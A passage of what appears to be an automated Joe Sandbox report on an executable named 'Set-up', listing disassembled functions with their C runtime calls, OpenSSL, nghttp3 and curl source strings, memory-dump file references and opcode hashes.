                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0081422C,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496714
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00496727
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00496776
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004967CC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno$strcmp
                                • String ID:
                                • API String ID: 3909137471-0
                                • Opcode ID: 57b2f149fe7bb17e1a68079a2d152a67dac08d219a4fa61685c72bfb3741a81c
                                • Instruction ID: 90d1b3f9da244d2e5fb8945ea4c37c236a3b9f5ee1dd684e067660e90820a5d8
                                • Opcode Fuzzy Hash: 57b2f149fe7bb17e1a68079a2d152a67dac08d219a4fa61685c72bfb3741a81c
                                • Instruction Fuzzy Hash: D931AE356002009FCF109FA9EC40A1B7AA9AF4A36CF4605B9FA98D7311E739ED11CB95
                                Function 002F2010 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON
                                Download Yara Rule
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,002F2704,00000008), ref: 002F204D
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,002F2704,00000008), ref: 002F20C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcpystrlen$memcpymemset
                                • String ID: copy_integer$crypto/params.c$general_set_int
                                • API String ID: 2323844366-2562949257
                                • Opcode ID: 53cdda920071fd9ccab5f50ed82219e7f8d810c3c4e850262c938ade6a39834c
                                • Instruction ID: a752bdb04469742f063b6f5023f7f01643b92fb0f707e5f9c6ed80ee30a6132a
                                • Opcode Fuzzy Hash: 53cdda920071fd9ccab5f50ed82219e7f8d810c3c4e850262c938ade6a39834c
                                • Instruction Fuzzy Hash: EE212DB1B283099BD23069189C82F77F794DB66744F14013EFF0997283E9D6AC2DC6A5
                                Function 002F2140 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON
                                Download Yara Rule
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,002F299E,00000008), ref: 002F21A8
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,002F299E,00000008), ref: 002F21FE
                                  • Part of subcall function 002F40A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,002F2075,?,?,?,?,?,?,002F2704,00000008), ref: 002F40C1
                                  • Part of subcall function 002F40A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,002F2075,?,?,?,?,?,?,002F2704,00000008), ref: 002F411E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: copy_integer$crypto/params.c$general_get_uint
                                • API String ID: 1297977491-1187682564
                                • Opcode ID: d8c1b3940f5325ac0216dacfbd218614da8967f1274936c00028ed3eaf688162
                                • Instruction ID: 07d5e0fc6d6b7ab5e97f02d83d7881087103912212a734ae387c0bf307d0ebe7
                                • Opcode Fuzzy Hash: d8c1b3940f5325ac0216dacfbd218614da8967f1274936c00028ed3eaf688162
                                • Instruction Fuzzy Hash: F52138B6B64209B6D62025286C03F7FA706CBD6B65F18013AFF0C661C3E9D968294995
                                Function 002F2240 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,002F2BF4,00000008), ref: 002F22C1
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,002F2BF4,00000008), ref: 002F2312
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: copy_integer$crypto/params.c$general_set_uint
                                • API String ID: 1297977491-3191580373
                                • Opcode ID: 029bb4ed8e212abee304fcceefd5b10f348f740bf839ad5cb3cda28bf42796a1
                                • Instruction ID: 0effe36ddb4cdad01c84e22cbc6b5365cf7b20ac13fa884da009dfa7b7340376
                                • Opcode Fuzzy Hash: 029bb4ed8e212abee304fcceefd5b10f348f740bf839ad5cb3cda28bf42796a1
                                • Instruction Fuzzy Hash: BE214FB0B38309ABEB3099649C42F3AF748DBD7744F14017EFE05961C3D5D9AC684661
                                Function 002F40A0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,002F2075,?,?,?,?,?,?,002F2704,00000008), ref: 002F40C1
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,002F2075,?,?,?,?,?,?,002F2704,00000008), ref: 002F411E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcpystrlen$memcpymemset
                                • String ID: copy_integer$crypto/params.c$unsigned_from_signed
                                • API String ID: 2323844366-3781254518
                                • Opcode ID: 94d823da53b08afc3fc678061bf839130548856f2a585cc6d07baf76bd42a897
                                • Instruction ID: ef84f2234de3d16b2b6601dd9dc11ddf15f75b860ecd6a166fb979810014bba4
                                • Opcode Fuzzy Hash: 94d823da53b08afc3fc678061bf839130548856f2a585cc6d07baf76bd42a897
                                • Instruction Fuzzy Hash: 6B012DA1B6431536E63076647C03F7B6B48CFE1B55F18053DFB08A61C3E5D9687846A2
                                Function 001BE600 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0070B19C,nghttp3_qpack.c,00000811,?,?), ref: 001BE866
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,001C077F,?,?,00000000,00000000), ref: 001BE87B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
                                • API String ID: 1222420520-1270044496
                                • Opcode ID: 9f2aeeb7bfeadba3305173f54e57cfd276d92dc483f60fb0742abff54db4d213
                                • Instruction ID: 737c58d8325e6a6a06008d40c3686838c7b71220757563fbfa2f25a484fbd2c3
                                • Opcode Fuzzy Hash: 9f2aeeb7bfeadba3305173f54e57cfd276d92dc483f60fb0742abff54db4d213
                                • Instruction Fuzzy Hash: 2481C2B5A00A019FD710DF24D842AA6B7F5FF59718F08462CF88A87752EB31F855CB91
                                Function 001181B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150stringCOMMON
                                Download Yara Rule
                                APIs
                                • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(001154E6), ref: 00118235
                                • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 001182D4
                                • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 001182E1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strrchr$_stat64
                                • String ID: mime.c
                                • API String ID: 2771713950-3378952128
                                • Opcode ID: c22abce8ce1b2eb9130c834a98cbd390efdc72c1e7ea2ca8ad7b57be057f71bc
                                • Instruction ID: 971523fcb0c46e2b027a2fd5d157fe99770e1b65dd0db33cca5cd214dae7c5b6
                                • Opcode Fuzzy Hash: c22abce8ce1b2eb9130c834a98cbd390efdc72c1e7ea2ca8ad7b57be057f71bc
                                • Instruction Fuzzy Hash: BA51E6B1A113009BEB189F14CC867973AA5AF50714F184138EC289F2C6EFB5CA858795
                                Function 00154380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • htons.WS2_32(?), ref: 001543D8
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00154409
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00154457
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: htonsmemcpystrlen
                                • String ID: curl_addrinfo.c
                                • API String ID: 2973076469-1838508774
                                • Opcode ID: 8c7a403375dd48fed1d70aa6bdfd0c31cb49c62ac8410a7bb85040863c64d571
                                • Instruction ID: 11e67a168167926f50b0cf06b4b20ddef5aa0ca22b9840a315163f1d470ba6bf
                                • Opcode Fuzzy Hash: 8c7a403375dd48fed1d70aa6bdfd0c31cb49c62ac8410a7bb85040863c64d571
                                • Instruction Fuzzy Hash: 624187B5A04705EFD700DF59C880A6AB7E4FF88318F04892DED998B361E330E994CB91
                                Function 00146650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105stringCOMMON
                                Download Yara Rule
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 0014665D
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0014670E
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 0014671C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$_time64
                                • String ID: altsvc.c
                                • API String ID: 2413861649-3234676706
                                • Opcode ID: 4e6087b02812d75a93de9637e31e6f8a3ee4e8b0d2a9888d490808da30162474
                                • Instruction ID: 3c0d3c035f9818b3014c547e962edcf15d61606cde6c0f3ddb67fa2d513c8130
                                • Opcode Fuzzy Hash: 4e6087b02812d75a93de9637e31e6f8a3ee4e8b0d2a9888d490808da30162474
                                • Instruction Fuzzy Hash: A131F7B1E08300ABD710EE24AC8296F7BE5AB5575CF054439FD0D9A262F731ED44C693
                                Function 001B42E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 001B435F
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 001B43EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                • API String ID: 1222420520-4133914617
                                • Opcode ID: b3441983fd29682457af571cdc099d6fc5b8ada999243d1ea18e96384e4e3211
                                • Instruction ID: 6d0c19527b1f4fab4a160807412d48c049ce74b28fd8cc6a0ce154ec2a7afd34
                                • Opcode Fuzzy Hash: b3441983fd29682457af571cdc099d6fc5b8ada999243d1ea18e96384e4e3211
                                • Instruction Fuzzy Hash: 4131B172500215AFE7129F54EC09FDA37E9BF66319F0904B4E9449B1A3E736D428C7A1
                                Function 001BA090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,001B70DF,00000001,?,?,?), ref: 001BA0E5
                                  • Part of subcall function 001BA140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 001BA29A
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,001B70DF,00000001,?,?,?), ref: 001BA135
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
